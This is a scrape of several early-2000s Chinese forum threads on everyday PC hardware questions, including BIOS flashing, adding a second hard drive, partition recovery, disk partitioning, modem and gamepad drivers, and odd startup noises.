 发表于 2002-02-18 10:15:52 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
是正版的吗？
多少钱？？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-19 21:26:24 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
dancing在上个帖子中说
引用:
用诺顿网络安全特警，高端服务器上我一直用着，很不错。

你开着它可以在经典发贴吗？我用Norton Personal Firewall就不行，按理说网络安全特警是Norton Personal Firewall+Norton Antivirus的啊

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：有谁能够介绍一下
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


怎么样更新主板的bios？ - 经 典 论 坛

计算机技术
怎么样更新主板的bios？

上一贴 | 下一贴
发表人 主题: 怎么样更新主板的bios？
netant

终级用户
积分：639
发帖：614
来自：欠发达地区
注册：2001-05-14
 发表于 2002-01-16 12:12:01 按此观看netant的个人资料 按此发邮件给netant 访问netant的主页 netant 的 oicq 是64188400,查看 64188400 的资料 收藏该主题供以后查看 发送悄悄话给netant 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看netant的IP
谢谢

我发现我上次用的签名档太没有个性了
ADSL

终级用户
积分：3031
发帖：686
来自：华尔街
注册：2001-03-06
 发表于 2002-01-16 12:15:10 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
下载一个BIOS刷新文件，bin文件。然后进入dos实模式开始刷新

好运永相随
wolfchen2000

笨笨狼
积分：861
发帖：667
来自：上海
注册：2000-10-04
 发表于 2002-01-16 12:21:54 按此观看wolfchen2000的个人资料 按此发邮件给wolfchen2000 wolfchen2000 的 oicq 是8405200,查看 8405200 的资料 发送悄悄话给wolfchen2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wolfchen2000的IP
操作是很方便的，但一定要心细,最好有一定的dos基础
先确认你主板的型号,下载相应的bios驱动,一般里面有一个bios刷新程序(象AWARD的BIOS通常是叫一个AWDFALASH的),在纯DOS下运行这个程序,----新bios可以放在软盘上,也可以在硬盘,执行后,会提示你保存现在的BIOS,保存后用新的覆盖即可.
切记:中间不要断电;
用软盘的话先检查软盘;
要在纯DOS下运行刷新程序

一个人过日子,虽然有点寂寞,但却别有乐趣

len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2002-01-16 13:16:26 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
1.确定主板的各种型号:在你下载BIOS之前,你要明确你的主板是哪个版本,刷错BIOS 可能会毁掉你的主板.
(1)从主板标识上来确认主板的型号.
(2)在系统启动时确认BIOS的版本.
(3)用BIOS测试软件,如ctbios检测.
2.刷新BIOS的步骤:
(1)下载版本正确的xxxxx.zip文件并解压它.
(2)准备一张DOS 6.2X 版本的启动盘(或 Windows 95/98 DOS 的启动盘), 盘中不带AUTOEXEC.BAT 和CONFIG.SYS文件,然后把以上文件（xxxxx.BIN文件和 AWDFLASH.EXE 工具软件)存到盘中.
进入BIOS 设置,记下先前你改动过的任何设置,然后在LOAD SETUP DEFAULT 这项中恢复.在BIOS 特性设置中,设置“Boot Sequence”为“A,C,SCSI”,并在 CHIPSET FEATURE SETUP 中将‘System BIOS Cacheable'设为Disable.如果主板有BIOS防改写功能,还要把此项功能关闭.
(3)重启,让系统由启动盘启动,然后在DOS 状态下键入以下命令: A:\>AWDFLASH xxxxx.BIN ( 回 车 )
屏幕上首先提示的问题是你是否需要把原来的BIOS从系统中存入文件中,你可以选择“N”,因为原 来的BIOS 文件在随主板出售时已带在随机盘中. 第二问题需要你确认升级BIOS,你只需按“Y”即可确认. 一旦BIOS升级后,你需要关机以后再开机一次.
(4)重新进入BIOS设置状态,进入设置缺损这项,把你以前记下的设置变动恢复过来.
存盘并退出BIOS设置,然后让系统重新启动.
刷BIOS可能出现的问题:
没有显示,但是从机中还是能听到一些嘀嘀声,而且软驱也是好的,那么说 不是所有BIOS内的东西都丢失了.你可以试用以下方式来恢复到原来状态:
准备一张刚才提到的启动盘,带有FLASH 工具和BIOS 文件;
在盘中用以下命令做一个AUTOEXEC.BAT文件: AWDFLASH xxxxx.BIN /SN /PY
选项/SN/PY 可以自动回答一般情况下你必须回答“不”或“是” 的问题,在这种情况下系统会由 软盘启动,编程BIOS并自动重新启动,但系统会用一段时间来运行程序,不要关机,等待系统重新启动。
如果你想看实际效果如何,你可以找一块ISA显示卡替代PCI或AGP显示卡 ,如果你没有ISA显示卡, 你还可以在黑屏状态下刷BIOS(黑屏时,BIOS可以由前面提到的驱动盘自动刷BIOS),在主板自动重 启后,拿出软盘,你的主板状态也恢复正常了.

UFO Bulletin Board ====> 不明飞行物
上一贴 | 下一贴
快速回复 主题：怎么样更新主板的bios？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


硬盘安装？？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
硬盘安装？？

上一贴 | 下一贴
发表人 | 主题: 硬盘安装？？
蓝极 我的家 积分：1417 发帖：832 来自：失落城市 注册：2001-02-01 | 发表于 2002-01-16 11:57:33 按此观看蓝极的个人资料 按此发邮件给蓝极 蓝极 的 oicq 是456874,查看 456874 的资料 收藏该主题供以后查看 发送悄悄话给蓝极 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝极的IP 我弄到了一个20G的硬盘！然后想晚上回家给家里8G的硬盘装上！想问一下可不可以直按不影响原来的硬盘直接加上这个20G的可不可以？还是必须得换？？ 家里的计算机是康柏的原装机！ 我随风飘……
northice 终级用户 积分：545 发帖：477 来自：来的地方 注册：2001-02-22 | 发表于 2002-01-16 12:07:44 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP 20G的跳成主硬盘，8G的作从硬盘 应该可以 YOU MUST GO,OR YOU WILL BE SAD!
蓝极 我的家 积分：1417 发帖：832 来自：失落城市 注册：2001-02-01 | 发表于 2002-01-16 12:43:56 按此观看蓝极的个人资料 按此发邮件给蓝极 蓝极 的 oicq 是456874,查看 456874 的资料 发送悄悄话给蓝极 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝极的IP 好像硬件的插孔没有这么多呀？怎么个跳法？？谁知道哪里有教程吗？ 我随风飘……
northice 终级用户 积分：545 发帖：477 来自：来的地方 注册：2001-02-22 | 发表于 2002-01-16 13:54:32 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP 硬盘背面有跳说明，MASTER主，SLAVE从，主板上有两个IDE接口，一个接光驱，一个接硬盘的，你把从盘接在那根以前的硬盘数据线上啊，有两个接口。（记得跳了线以后，然后BIOS里找一个） YOU MUST GO,OR YOU WILL BE SAD!
啸 无意 现任版主 积分：6225 发帖：2154 来自： 注册：2000-08-01 | 发表于 2002-01-17 10:49:38 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 恩，可以考虑和光驱用一条线，建议把20G的设为主盘，8G的设为从盘，主盘接在第一个IDE接口上，从盘和光驱接在第二个IDE接口上，主从盘的跳线设置在硬盘上都有，你仔细找找 [image] (我的机子硬盘和你的完全一样，也是一个20G,一个8G的，8G那个我是用来做备份盘，不用的时候很少接上，这样可以防止误删或病毒感染) 宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒...... Blueidea Web Team. Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 主题：硬盘安装？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


救救我的资料~~~~~~~~！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
救救我的资料~~~~~~~~！

上一贴 | 下一贴
发表人 | 主题: 救救我的资料~~~~~~~~！
宇宙星云 终级用户 积分：474 发帖：305 来自：广州 注册：2000-12-13 | 发表于 2002-01-19 22:01:31 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP 我硬盘用GHOST是导致资料没了。怎么办，有没有办法恢复？我原来是5个区的，现在只有两个。救我呀！！！ ┏━━┓∴· oooO Oooo°∴┏━━┓ ┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃ ┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃ ┗━━┛★．° \_) (_/·．★┗━━┛
阿修罗飞天舞 无关风月 现任版主 积分：2516 发帖：2481 来自：杭州 注册：2001-05-21 | 发表于 2002-01-20 02:23:13 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP MBR（MAIN BOOT RECORD）即主引导记录区，它位于整个硬盘的0磁道0柱面1扇区，包括硬盘引导程序和分区表。 DBR（DOS BOOT RECORD）即操作系统引导记录区，通常位于硬盘的0磁道1柱面1扇区，是操作系统可直接访问的第一个扇区，它也包括一个引导程序和一个被称为BPB（BIOS PARAMETER BLOCK）的本分区参数记录表。每个逻辑分区都有一个DBR。 FAT(file allocation table)即文件分配表，是dos,windows9X系统的文件寻址格式，为了数据安全起见，FAT一般做两个，第二FAT为第一FAT的备份。 DIR 是DIRECTORY即根目录区的简写，DIR紧接在第二FAT表之后。 估计数据丢失原因： 1、安装多系统引导软件后，异常操作造成。 2、遭到某种病毒感染。 可使用 NORTON DISK DOCTOR：diskedit.exe 坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月 随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽 Blueidea Web Team
阿修罗飞天舞 无关风月 现任版主 积分：2516 发帖：2481 来自：杭州 注册：2001-05-21 | 发表于 2002-01-20 02:27:40 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP 运行UNFORMAT命令 DOS下MIROR命令用于记录当前磁盘的信息，供格式化或删除之后的恢复使用 KV3000 此外最好先恢复硬盘为原先分区状态后再处理 坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月 随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽 Blueidea Web Team
上一贴 | 下一贴
快速回复 主题：救救我的资料~~~~~~~~！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何给硬盘分区（转） - 经 典 论 坛

计算机技术
如何给硬盘分区（转）

上一贴 | 下一贴
发表人 主题: 如何给硬盘分区（转）
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-28 08:32:46 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
很基础的东西，不会的朋友建议看一下，会的朋友也可以复习复习。

引用:

如何给硬盘分区

星原

    1．在DOS的系统架构下，分区有三种：主分区（Primary Partition）、扩充分区（Extended Partition）、逻辑磁盘（Logical Drive）。
    2．如果使用DOS的Fdisk．exe指令来分区硬盘，一块硬盘上只能有一个主分区。在已经存在一个主分区的硬盘上，DOS不允许您再建立其他主分区，不过您却可以再建立逻辑磁盘。但使用其他的分区程序，如OS／2的Boot Manager便可以在一块硬盘中分区出至多四个主分区（对Boot Manager来说，扩充分区也算一个主分区），然后选择要用来启动的分区（假设该分区中存在有操作系统的引导代码）。使用Boot Manager来以硬盘中的主分区中的操作系统开机时，Boot Manager会把其他主分区的属性设为隐藏，就是您无法看到除了启动主分区之外的其他主分区中的东西。
    3．逻辑磁盘必须建立在扩充分区之上。如果需要逻辑磁盘，您必须先建立扩充分区，然后再于扩充分区上建立逻辑磁盘。如果只建立扩充分区，则开机后该扩充分区无法被DOS存取。
    4．在DOS环境中，硬盘的主分区必须使用Fdisk．exe来“Set Active Partition”（设置活动分区），也就是设定为可以启动（或说可开机），才能用来开机。否则就算使用Format指令加上／s参数来格式化分区、或者是Format完硬盘之后再用SysC：指令，该分区也不能用来启动计算机。而且只有第一块硬盘的主分区能“Set Active Partition”。
    5．做完硬盘分区的工作之后，您必须对每一个分区分别Format，否则在您欲存取该分区时，会看到错误讯息“Invalid media type reading drivex：”。其中x：表示该分区所分配到的磁盘代号。
    6．若您拥有超过一个硬盘，而且每个硬盘之中存在一个以上的分区时，磁盘代号会依据分区的类型及数目而有不同的排列顺序。
    例如，在装有两块硬盘的电脑中，假设第一块硬盘上有一个主分区和两个逻辑磁盘，第二块硬盘有一个主分区和一个逻辑磁盘，则第一块硬盘的主分区的磁盘代号是C、第二块硬盘的主分区的磁盘代号是D、第一块硬盘的逻辑分区的磁盘代号是E与F、第二块硬盘的逻辑磁盘的磁盘代号是G与H。
    总而言之，磁盘代号的排列顺序是：主分区优先，逻辑磁盘次之。常有使用者因为加了新硬盘之后，磁盘代号排列“错乱”，影响到一些原本已安装好的软件，其实，只要在新硬盘上不要使用Primary Partition（主分区）分区类型，全部割成Extended Partition（扩充分区）然后建立Logical Drive（逻辑磁盘），新硬盘被分配的磁盘代号就不会被插入在旧硬盘的磁盘代号前面了。至于加上第三块，乃至于第四块硬盘后，磁盘代号会如何改变，可依上表的规则类推，大家可以试着分区看看（如果手上有空硬盘可供实验的话）！

引自：http://zjuwww.dhs.org/~wzg188/reseller/html/article/d1a72808.htm

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

鸵鸟γδξπηφ

高级用户
积分：219
发帖：55
来自：
注册：2002-01-27
 发表于 2002-01-28 14:18:50 按此观看鸵鸟γδξπηφ的个人资料 按此发邮件给鸵鸟γδξπηφ 发送悄悄话给鸵鸟γδξπηφ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鸵鸟γδξπηφ的IP
亲亲～ ~O~

寂寞的《鸵鸟γδξπηφ》啊～～我在像野驴一样疯狂的奔跑！
上一贴 | 下一贴
快速回复 主题：如何给硬盘分区（转）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


请教一下:modern安装 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
请教一下:modern安装

上一贴 | 下一贴
发表人 | 主题: 请教一下:modern安装
/一般拉傻 高级用户 积分：278 发帖：199 来自：CQ 注册：2001-07-08 | 发表于 2001-12-16 17:47:59 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 收藏该主题供以后查看 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP 我的机器每次重装后没有办法安装modern的驱动,首先它不会提示找到新硬件,通过设备管理器和控制面板 里的添加新硬件也不行,只有把modern拔掉后再插上,这才会开机时出现提示找到新硬件,才能装好驱动. 另外我发现modern是被装在com4上的,而不是com1或com2.驱动的文件不是那种安装程序,就是几个文件. 不是到那位知道该怎么装而不开机箱? win98,gvc内置. 谢谢 想做一件事 做这件事的益处是显而易见的。 成功后它所来的影响是全世界的历史性进步！ 这里需要强调的是“历史性”三个字！ 那么，这件事是什么呢？ 事成之后即见分晓……
yuzhiqing 终级用户 积分：747 发帖：439 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-16 20:10:48 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 方法一，右点我的电脑，再点设备管理，再点端口，将你的端口1，2改为3，或4，看那个能正常用就用那个 2，在bois里可以设置，具体忘记了：） WINDFLASH ::浅紫色FORUM::
/一般拉傻 高级用户 积分：278 发帖：199 来自：CQ 注册：2001-07-08 | 发表于 2001-12-17 12:35:10 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP 谢 想做一件事 做这件事的益处是显而易见的。 成功后它所来的影响是全世界的历史性进步！ 这里需要强调的是“历史性”三个字！ 那么，这件事是什么呢？ 事成之后即见分晓……
上一贴 | 下一贴
快速回复 主题：请教一下:modern安装
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


怎样屏敝掉主板自的声卡 - 经 典 论 坛

计算机技术
怎样屏敝掉主板自的声卡

上一贴 | 下一贴
发表人 | 主题: 怎样屏敝掉主板自的声卡
jdrch 超级用户 积分：354 发帖：118 来自：潮阳、广东、中国 注册：2001-08-29 | 发表于 2001-12-18 11:48:29 按此观看jdrch的个人资料 按此发邮件给jdrch 访问jdrch的主页 jdrch 的 oicq 是79387841,查看 79387841 的资料 收藏该主题供以后查看 发送悄悄话给jdrch 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jdrch的IP 我的声卡是主板自带的，每次一开机总是会大叫一声“爆音”，受不了它，想把它屏敝，要怎么办。 还有，顺便请大家给推荐一款1xx来块的声卡。 谢谢！！ 曾经年少爱追梦，一心只想往前飞
yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2001-12-18 11:58:20 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 开机时按del 进入cmos里面设置找有关声卡的一下 改成disable~ 1**多的卡~推荐用创新sb128 挺好的~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
jdrch 超级用户 积分：354 发帖：118 来自：潮阳、广东、中国 注册：2001-08-29 | 发表于 2001-12-18 12:10:38 按此观看jdrch的个人资料 按此发邮件给jdrch 访问jdrch的主页 jdrch 的 oicq 是79387841,查看 79387841 的资料 发送悄悄话给jdrch 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jdrch的IP 多谢强盗，但是创新的 sb128要两百多啊 曾经年少爱追梦，一心只想往前飞
上一贴 | 下一贴
快速回复 主题：怎样屏敝掉主板自的声卡
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请教高手！！！ - 经 典 论 坛

计算机技术
请教高手！！！

上一贴 | 下一贴
发表人 | 主题: 请教高手！！！
飞影 初级用户 积分：55 发帖：71 来自： 注册：2001-08-14 | 发表于 2001-12-16 17:29:35 按此观看飞影的个人资料 按此发邮件给飞影 飞影 的 oicq 是6172053,查看 6172053 的资料 收藏该主题供以后查看 发送悄悄话给飞影 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞影的IP 我有一个打印机接口的游戏手柄，可装了以后没反应，按什么按钮都没用，驱动程序我也按说明安装了，可就是不知道怎么回事？？
yuzhiqing 终级用户 积分：747 发帖：439 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-16 19:10:44 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 看看你的驱动是不是有冲突，硬件识别没有，右点我的电脑，看有没有黄色的 WINDFLASH ::浅紫色FORUM::
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-17 03:21:41 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 到 控制面板>游戏选项 看看是否可以看到你装的游戏手柄 如果有就没错了 在“属性”中还可以测试各个按钮 游戏手柄只有在游戏中才能生效（且游戏也需要支持手柄） 在普通Windows操作中是无效的 你该不会以为手柄可以控制鼠标吧 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
飞影 初级用户 积分：55 发帖：71 来自： 注册：2001-08-14 | 发表于 2001-12-17 09:27:07 按此观看飞影的个人资料 按此发邮件给飞影 飞影 的 oicq 是6172053,查看 6172053 的资料 发送悄悄话给飞影 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞影的IP 硬件没冲突，很正常 还有，我那个手柄就是在“属性”中不能测试，按什么键也没用，有时还会死机。
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-17 18:56:14 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 那就是没装好 把详细情况说出来 手柄型号、驱动程序、安装说明等 不要和挤牙膏似的问一点说一点 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
AirTree 超级用户 积分：375 发帖：231 来自：无人地带 注册：2001-12-07 | 发表于 2001-12-18 12:53:10 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP 驱动不正确！有时候硬件安装后系统认为是正常的，其实根本没有正确驱动，或者驱动不正常，你测试按键没有发应就是这个原因。从新来过吧！上帝保佑！ 打雷了！下雨了！大家快回家收衣服啊……
上一贴 | 下一贴
快速回复 主题：请教高手！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


最近几天开机是机器出现异响 - 经 典 论 坛

计算机技术
最近几天开机是机器出现异响

上一贴 | 下一贴
发表人 主题: 最近几天开机是机器出现异响
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-16 17:48:23 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 收藏该主题供以后查看 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
最近几天开机是机器出现异响,启动完成后就停了,我也不知道到底是什么东西在想,在其他地方也见过这
种情况,想必很多人都遇到过,请告诉一下我怎么办,谢谢.

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
yuzhiqing

终级用户
积分：747
发帖：439
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-16 20:00:25 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
首先在dos下杀毒，再在安全模式下看是有什么问题，再检查硬件故障。。

WINDFLASH
::浅紫色FORUM::
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-16 20:09:13 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
应该是哪个硬件的事,不好判断,听不出是什么东西在响

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
yuzhiqing

终级用户
积分：747
发帖：439
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-16 20:16:18 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
你在进win98（是用这个吗？我最熟悉了）前检测了硬盘，光驱，内存没有？

你用的cpu散热好吗？

WINDFLASH
::浅紫色FORUM::
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-17 12:33:46 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
除了开机时的响声外在使用中没有任何问题. cpu的温度不知.

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2001-12-17 13:53:32 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
/一般拉傻在上个帖子中说
引用:
除了开机时的响声外在使用中没有任何问题. cpu的温度不知.

至少描述一下响声的特点，只是说开机异响，没有办法判断。

UFO Bulletin Board ====> 不明飞行物
yuzhiqing

终级用户
积分：747
发帖：439
来自：中国湖北
注册：2001-04-01
